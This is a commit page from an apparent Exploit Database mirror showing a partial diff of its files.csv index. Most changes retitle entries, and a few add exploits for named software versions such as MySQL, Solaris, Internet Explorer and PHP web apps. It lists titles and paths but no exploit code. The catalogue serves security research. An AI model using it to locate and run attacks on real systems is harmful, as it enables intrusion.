bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-15

Browse source 
5 new exploits

MyServer 0.8.11 - (204 No Content) error Remote Denial of Service
MyServer 0.8.11 - '204 No Content' error Remote Denial of Service

Microsoft Internet Explorer 11 MSHTML - CMap­Element::Notify Use-After-Free (MS15-009)

Microsoft Internet Explorer 9-11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)

MySQL 4.0.17 - UDF Dynamic Library Exploit
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)

Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit
Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit

Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation
Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)

Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation
Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)

Solaris 10 (libnspr) - Constructor Privilege Escalation
Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)

IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug

Apple MacOS 10.12 - 'task_t' Privilege Escalation
Apple macOS 10.12 - 'task_t' Privilege Escalation

Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation
Solaris 8/9 ps - Environment Variable Information Leak
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation
Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation
Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)

Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - /bin/login Buffer Overflow
Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Buffer Overflow

Oracle 9i / 10g (extproc) - Local+Remote Command Execution
Oracle 9i / 10g (extproc) - Local / Remote Command Execution

Solaris/SPARC 2.5.1/2.6/7/8 - Derived 'login' Buffer Overflow

Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)

MiniNuke 1.8.2 - (news.asp hid) SQL Injection
MiniNuke 1.8.2 - 'hid' Parameter SQL Injection

MiniNuke 1.8.2b - (pages.asp) SQL Injection
MiniNuke 1.8.2b - 'pages.asp' SQL Injection

MiniNuke 2.x - (create an admin) SQL Injection
MiniNuke 2.x - SQL Injection (Add Admin)

Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit
Nukedit CMS 4.9.6 - Unauthorized Admin Add

Portail Web PHP 2.5.1 - (includes.php) Remote File Inclusion
Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion
CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion
Mambo Module Weather - 'absolute_path' Remote File Inclusion
CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion
Mambo Module Weather - 'absolute_path' Parameter Remote File Inclusion

mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion
mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion

RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion
RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion

BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection
BlogPHP 2 - 'id' Parameter Cross-Site Scripting / SQL Injection
MultiCart 2.0 - (productdetails.php) SQL Injection
PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection
PHP-Nuke Module Siir - 'id' SQL Injection
MultiCart 2.0 - 'productdetails.php' SQL Injection
PHP-Nuke Modules Manuales 0.1 - 'cid' Parameter SQL Injection
PHP-Nuke Module Siir - 'id' Parameter SQL Injection
OSSIM 0.9.9rc5 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection
OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection
PHP-Nuke Module NukeC 2.1 - 'id_catg' Parameter SQL Injection

PHPProfiles 4.5.2 Beta - (body_comm.inc.php) Remote File Inclusion
PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion
PHPUserBase 1.3b - (unverified.inc.php) Local File Inclusion
PHPUserBase 1.3b - (unverified.inc.php) Remote File Inclusion
PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion
PHPUserBase 1.3b - 'unverified.inc.php' Remote File Inclusion
PHP-Nuke Module Kose_Yazilari - (artid) SQL Injection
MiniNuke 2.1 - (members.asp uid) SQL Injection
PHP-Nuke Module Kose_Yazilari - 'artid' Parameter SQL Injection
MiniNuke 2.1 - 'uid' Parameter SQL Injection
Nukedit 4.9.x - Remote Create Admin Exploit
WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities
Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection
Nukedit 4.9.x - Remote Create Admin
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
Mambo Component SimpleBoard 1.0.3 - 'catid' Parameter SQL Injection
GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion
Koobi Pro 5.7 - (categ) SQL Injection
GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion
Dream4 Koobi Pro 5.7 - 'categ' Parameter SQL Injection
barryvan compo manager 0.5pre-1 - Remote File Inclusion
PHP-Nuke My_eGallery 2.7.9 - SQL Injection
Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure
Koobi CMS 4.3.0 < 4.2.3 - (categ) SQL Injection
Barryvan Compo Manager 0.3 - Remote File Inclusion
PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure
Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection
Koobi Pro 6.25 - links SQL Injection
Koobi Pro 6.25 - shop SQL Injection
Koobi Pro 6.25 - gallery SQL Injection
Koobi Pro 6.25 - showimages SQL Injection
Koobi 4.4/5.4 - gallery SQL Injection
Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection
Dream4 Koobi Pro 6.25 Showimages - 'galid' Parameter SQL Injection
Dream4 Koobi 4.4/5.4 - gallery SQL Injection
Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections
Koobi Pro 6.25 - poll SQL Injection
Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections
Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection

Podcast Generator 1.2 - GLOBALS[] Multiple Vulnerabilities
Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities

DBHCMS Web Content Management System 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - Remote File Inclusion

Koobi Pro 6.1 - Gallery (img_id)
Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection

dbhcms 1.1.4 - Persistent Cross-Site Scripting
DBHcms 1.1.4 - Persistent Cross-Site Scripting

DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection
DBHcms 1.1.4 - 'dbhcms_user/SearchString' Parameter SQL Injection

podcast generator 1.3 - Multiple Vulnerabilities
Podcast Generator 1.3 - Multiple Vulnerabilities

PHP Download Manager 1.1.x - files.php SQL Injection
PHP Download Manager 1.1.x - 'files.php' SQL Injection

Koobi 5.0 - BBCode URL Tag Script Injection
Dream4 Koobi 5.0 - BBCode URL Tag Script Injection

Koobi Pro 5.6 - showtopic Module toid Parameter Cross-Site Scripting
Koobi Pro 5.6 - showtopic Module toid Parameter SQL Injection
Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection
Portail Web PHP 2.5.1 - config/conf-activation.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - menu/item.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - modules/conf_modules.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - system/login.php site_path Parameter Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion
Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion

Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting

Barryvan Compo Manager 0.3 - 'main.php' Remote File Inclusion

Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities

DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion
DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion

Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution
This commit is contained in:
Offensive Security 2016-11-15 05:01:20 +00:00
parent 38e316551e
commit c27aa131c8
18 changed files with 969 additions and 1874 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

140
files.csv
View file

@ -697,7 +697,7 @@ id,file,description,date,author,platform,type,port
5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0
5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,multiple,dos,0
5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - (204 No Content) error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0
5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0
5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0
@ -2584,6 +2584,7 @@ id,file,description,date,author,platform,type,port
21174,platforms/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0
21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0
21177,platforms/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",windows,dos,0
40757,platforms/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 MSHTML - CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,windows,dos,0
21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",multiple,dos,0
21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,linux,dos,0
21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0
@ -5260,7 +5261,7 @@ id,file,description,date,author,platform,type,port
40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9-11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5512,7 +5513,7 @@ id,file,description,date,author,platform,type,port
1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0
1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0
1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0
1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0
1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0
@ -5550,7 +5551,7 @@ id,file,description,date,author,platform,type,port
1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash",2006-02-08,kokanin,qnx,local,0
1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0
1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation",2006-02-20,"Marco Ivaldi",linux,local,0
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)",2006-02-20,"Marco Ivaldi",linux,local,0
1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Privilege Escalation",2006-02-26,prdelka,sco,local,0
1545,platforms/osx/local/1545.pl,"Apple Mac OSX - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0
40340,platforms/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local,0
@ -5603,7 +5604,7 @@ id,file,description,date,author,platform,type,port
2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC)",2006-08-08,Heintz,php,local,0
2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow",2006-08-16,Andi,linux,local,0
2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure",2006-08-22,"Marco Ivaldi",solaris,local,0
2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0
2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0
2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0
@ -5619,16 +5620,16 @@ id,file,description,date,author,platform,type,port
2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0
2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0
2492,platforms/linux/local/2492.s,".ELF Binaries - Privilege Escalation",2006-10-08,Sha0,linux,local,0
2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation",2006-10-13,"Marco Ivaldi",solaris,local,0
2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0
2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
2569,platforms/solaris/local/2569.sh,"Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation",2006-10-16,"Marco Ivaldi",solaris,local,0
2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0
2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0
2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0
2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2641,platforms/solaris/local/2641.sh,"Solaris 10 (libnspr) - Constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0
2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0
2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0
2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
@ -6139,7 +6140,7 @@ id,file,description,date,author,platform,type,port
9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0
9628,platforms/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,windows,local,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local,0
9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0
9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0
9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,windows,local,0
9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0
9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
@ -8622,17 +8623,13 @@ id,file,description,date,author,platform,type,port
40653,platforms/osx/local/40653.txt,"Apple OS X/iOS - Kernel IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0
40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40669,platforms/osx/local/40669.txt,"Apple MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0
40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40726,platforms/linux/local/40726.c,"Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation",2004-12-04,"Marco Ivaldi",linux,local,0
40727,platforms/solaris/local/40727.sh,"Solaris 8/9 ps - Environment Variable Information Leak",2006-07-26,"Marco Ivaldi",solaris,local,0
40728,platforms/solaris/local/40728.c,"Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40729,platforms/solaris/local/40729.c,"Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40730,platforms/solaris/local/40730.c,"Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@ -8878,7 +8875,7 @@ id,file,description,date,author,platform,type,port
705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000
711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21
712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000
716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - /bin/login Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513
716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513
719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0
729,platforms/windows/remote/729.txt,"PHP 4.3.7 - openlog() Buffer Overflow",2004-12-28,"The Warlock [BhQ]",windows,remote,80
@ -9188,7 +9185,7 @@ id,file,description,date,author,platform,type,port
2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69
2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389
2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21
2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
@ -11999,7 +11996,6 @@ id,file,description,date,author,platform,type,port
21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x - Outbound Packet Bypass",2001-12-06,"Tom Liston",windows,remote,0
21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 - Unauthorized Mail Server Use",2001-12-11,http-equiv,windows,remote,0
21179,platforms/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 - Derived 'login' Buffer Overflow",2003-01-09,snooq,solaris,remote,0
21180,platforms/solaris/remote/21180.c,"Solaris/SPARC 2.5.1/2.6/7/8 - Derived 'login' Buffer Overflow",2004-12-04,"Marco Ivaldi",solaris,remote,0
21182,platforms/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication",2001-12-15,"Adam Gray",novell,remote,0
21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal",2001-12-17,"A. Ramos",cgi,remote,0
21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,unix,remote,0
@ -15059,7 +15055,8 @@ id,file,description,date,author,platform,type,port
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
